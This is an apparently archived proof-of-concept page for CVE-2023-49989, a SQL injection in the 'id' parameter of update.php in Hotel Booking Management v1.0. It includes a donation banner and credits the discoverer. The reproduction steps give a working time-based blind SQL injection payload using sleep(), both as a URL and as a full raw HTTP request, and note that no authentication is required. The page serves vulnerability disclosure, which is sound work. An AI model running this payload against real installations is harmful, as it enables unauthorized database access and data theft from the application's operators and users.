Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2023-49989 PoC — Hotel Booking Management 安全漏洞

Source
Associated Vulnerability
Title:Hotel Booking Management 安全漏洞 (CVE-2023-49989)
Description:Hotel Booking Management是Pratham个人开发者的一个用于酒店预订管理的数据库 Web 应用程序。 Hotel Booking Management v1.0版本存在安全漏洞,该漏洞源于通过 update.php 中的 id 参数发现包含 SQL 注入漏洞。
Description
Hotel Booking Management v1.0 - SQL Injection Vulnerability in the "id" parameter at update.php
Readme
# CVE-2023-49989
# Hotel Booking Management v1.0 - SQL Injection Vulnerability in the "id" parameter at update.php

**Description**: Hotel Booking Management v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at update.php.  
  
**Vulnerable Product Version**: Hotel Booking Management v1.0  
**CVE Author**: Geraldo Alcântara  
**Date**: 28/11/2023  
**Confirmed on**: 19/12/2023  
**CVE**: CVE-2023-49989     
**Tested on**: Windows  
### Steps to reproduce:  
To exploit the vulnerability, an attacker only needs to send the SQL injection payload to update.php through the vulnerable 'id' parameter. No authentication is required. http://{{IP}}/HotelBookingManagement-main/update.php?id=1%20and%20(select*from(select(sleep(20)))a)--%20
### Request:  
```
GET /HotelBookingManagement-main/update.php?id=1%20and%20(select*from(select(sleep(5)))a)--%20 HTTP/1.1
Host: 192.168.68.148
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
```
Discoverer(s)/Credits:  
Geraldo Alcântara
File Snapshot

[4.0K] /data/pocs/5a30e665c4444ee01443b7089080624d139a2cd0 └── [1.2K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.